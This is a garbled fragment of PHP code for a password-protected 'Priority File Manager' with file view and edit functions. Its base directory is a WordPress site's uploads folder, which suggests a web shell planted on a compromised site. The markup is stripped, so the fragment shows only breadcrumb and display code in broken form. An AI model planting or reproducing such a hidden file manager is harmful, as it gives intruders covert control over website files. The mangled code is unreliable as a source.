Base Directory:
/home/toolrmtm/crazyespresso.com/wp-content/uploads
" . htmlspecialchars(basename($root)) . "";
foreach ($parts as $part) {
if ($part === "") continue;
$build .= "/" . $part;
$out .= "
/ " . htmlspecialchars($part) . "";
}
return $out;
}
function root_selector($current_root, $allowed_roots) {
global $required_pass;
$out = "
";
return $out;
}
?>
Priority File Manager
= $msg ?>
Root Directory: = root_selector($root, $allowed_roots) ?>
= breadcrumb($root, $real) ?>
= htmlspecialchars($real) ?>
Edit File: = htmlspecialchars($_GET["edit"]) ?>
View File: = htmlspecialchars($_GET["view"]) ?>
= htmlspecialchars($content) ?>